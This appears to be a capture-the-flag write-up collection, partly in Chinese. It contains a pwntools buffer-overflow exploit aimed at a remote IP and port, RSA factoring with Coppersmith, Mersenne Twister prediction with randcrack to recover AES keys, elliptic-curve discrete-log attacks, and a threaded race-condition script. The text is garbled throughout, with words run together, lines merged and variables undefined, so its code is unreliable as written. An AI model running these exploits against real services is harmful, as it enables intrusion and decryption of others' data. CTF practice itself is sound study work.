from pwn import * #p=process('./pwn') p=remote('139.9.123.168',32548) elf=ELF('./pwn') #gdb.attach(p,'b *0x4011AA') p.sendlineafter('Who are you? What do you want?\n','a'*0x90+'b'*8+p64(0x0000000000401016)+p64(0x000000000040120b)+p64(0x403408)+p64(elf.sym['system'])) p.interactive()
p = 22186905890293167337018474103 q = 64390888389278700958517837593
e = 65537
d = inverse(e, (p-1)*(q-1)) m = pow(c, d, n) print(long_to_bytes(m))
# xiaoMing
e2.py
from Crypto.Util.number import *
withopen('out') as f: s = f.read().splitlines()
c = eval(s[2]) n = eval(s[3])
p = 11616788973244169211540879051135531683500013311175857700532973853592727185033846064980717918194540453710515251945345524986932165003196804187526561468278997
withopen('out') as f: s = f.read() s = s.splitlines()
q = eval(s[4]) A = eval(s[5]) b = eval(s[6])
A = Matrix(Zmod(q), A) b = vector(Zmod(q), b)
x = A.solve_right(b) x = ''.join([chr(i) for i in x]) print(x)
# xiaoMing@amail.com
e4.py
import random from Crypto.Util.number import * from Crypto.Cipher import AES from randcrack import RandCrack import string import itertools from tqdm import tqdm import pickle
defmy_submit(rc, x, t): for i inrange(t): rc.submit(x % (1 << 32)) x >>= 32
for a1, b1 in [[p1, q1], [q1, p1]]: aleft = a1 - 1 while (not isPrime(aleft)): aleft -= 1 bleft = b1 - 1 while (not isPrime(bleft)): bleft -= 1 for aa, bb, o2 in tqdm(itertools.product(range(aleft, a1)[::-1], range(bleft, b1)[::-1], range(2))): rc = RandCrack() my_submit(rc, aa, 3) my_submit(rc, bb, 3) my_submit(rc, append_2, 5) off2 = 2 * offset2 + o2 my_submit(rc, off2, 1) for i in s: rc.submit(i)
key = rc.predict_getrandbits(128) key = long_to_bytes(key, 16) cipher = AES.new(key, AES.MODE_ECB) m = cipher.decrypt(c4) if (all(x in ok_char for x in m)): print(m) print() print(aa) print(bb) print(off2) exit(0)
# No.123_doge_road
e5.py
from Crypto.Util.number import * from Crypto.Cipher import AES from randcrack import RandCrack
aa = 22186905890293167337018474102 bb = 64390888389278700958517837515 off2 = 3288350018
withopen('out') as f: ss = f.read().splitlines() s = eval(ss[5]) c4 = eval(ss[7]) c4 = long_to_bytes(c4)
q, g, h = [eval(x) for x in ss[8].split()] c1, c2 = [eval(x) for x in ss[9].split()] gg = rc.predict_randrange(q-1) print(g == gg) x = rc.predict_randrange(q-1) y = rc.predict_randrange(q-1) s = pow(g, x*y, q) m5 = c2 * inverse(s, q) % q print(long_to_bytes(m5))
# Make666GreatAgain_University
finexp.py
from hashlib import sha256
name = b'xiaoMing'
phone = b'14115102907'
mail = b'xiaoMing@amail.com'
address = b'No.123_doge_road'
school = b'Make666GreatAgain_University'
flag = 'flag{'+sha256(name).hexdigest()[:8]+'-'+sha256(phone).hexdigest()[:4]+'-'+sha256(mail).hexdigest()[:4]+'-'+sha256(address).hexdigest()[:4]+'-'+sha256(school).hexdigest()[:12]+'}'
RSA+xor,从低位到高位枚举分析。 也就是依次模$2^1, 2^2, \ldots, 2^{400}$进行分析。 每次枚举$p, q$的高位并且利用$n$和$x$进行验算。 这样到400位,就可以求出若干$p, q$的低400位。 然后对于每个可能的低位$p$,构造多项式 $$f(x) = 2^{400} x + p$$ 并用Coppersmith small root求解$x$,进而得到$p$,也就得到了$n=pq$的分解 之后就算得解密指数$d$,解密密文即可。
e1.py
from sage.allimport * from tqdm import tqdm
c = 51527129112041727084653138724362414261275943766050564614480874091504860204252606590600308110384082623259378144308474054746140923358753034723604762350226880256680349452009792177706794254189892857145865023696386031044387376465031791954744691766962599322069213009628794080376529614779412009851632855178036285523 e = 65537 n = 116652897843293883441819903375596603379518724751574619124014296798496676038791377773876686025057284152512331129032274361942198246462102132225928556778732123779685850832525256744533855512548226749675828320075447142642844219402725358384766251737244370235962898005154181991761923091468959986835373399473596976197 x = 471475951883841996380755394497425485938102193317354065361151516006175011110693734273770491686812217784012615381122407908
pre_sol = [(1, 1)]
for i in tqdm(range(1, 400)): cur_pow = (1 << (i+1)) cur_sol = [] for pre_p, pre_q in pre_sol: for s inrange(2): for t inrange(2): cur_p = pre_p + s * (1 << i) cur_q = pre_q + t * (1 << i) if (cur_p ^ cur_q == x % cur_pow and cur_p * cur_q % cur_pow == n % cur_pow): cur_sol.append((cur_p, cur_q)) pre_sol = cur_sol
F, x = PolynomialRing(Zmod(n), name='x').objgen() print(F) print(x) for p, q in tqdm(cur_sol): f = x * 2 ** 400 + p f = f.monic() sol = f.small_roots(X = 2 ** 112, beta = 0.4) if (sol != []): print(sol[0] * 2 ** 400 + p) break
e2.py
from Crypto.Util.number import *
p = 12172529005716175430901283903834642726755657633565845783363589139718811888175215203727237853050161503063968274652006993195449591640852850585439495172789713
c = 51527129112041727084653138724362414261275943766050564614480874091504860204252606590600308110384082623259378144308474054746140923358753034723604762350226880256680349452009792177706794254189892857145865023696386031044387376465031791954744691766962599322069213009628794080376529614779412009851632855178036285523 e = 65537 n = 116652897843293883441819903375596603379518724751574619124014296798496676038791377773876686025057284152512331129032274361942198246462102132225928556778732123779685850832525256744533855512548226749675828320075447142642844219402725358384766251737244370235962898005154181991761923091468959986835373399473596976197
q = n // p
d = inverse(e, (p-1)*(q-1)) m = pow(c, d, n) print(long_to_bytes(m)) ##flag{f092l9er-hgmj-lw5q-5d52-hwayzk6n5joj}
ecc
直接梭。。。
p = 146808027458411567 A = 46056180 B = 2316783294673 E = EllipticCurve(GF(p),[A,B]) P=E(119851377153561800 , 50725039619018388) Q=E (22306318711744209 , 111808951703508717)
p = 1256438680873352167711863680253958927079458741172412327087203 A = 377999945830334462584412960368612 B = 604811648267717218711247799143415167229480 E = EllipticCurve(GF(p),[A,B]) P=E(550637390822762334900354060650869238926454800955557622817950, 700751312208881169841494663466728684704743091638451132521079) Q=E(1152079922659509908913443110457333432642379532625238229329830 ,819973744403969324837069647827669815566569448190043645544592)
primes = [2,5,7,27,212117,302426983] dlogs = [] for fac in primes: t = int(int(E.order()) / int(fac)) dlog = discrete_log(t*Q,t*P,operation="+") dlogs += [dlog] print("factor: "+str(fac)+", Discrete Log: "+str(dlog)) #16093767336603949
if __name__=="__main__": event = threading.Event() session = requests.session() for i inrange(1,80): threading.Thread(target=write,args=(session,)).start()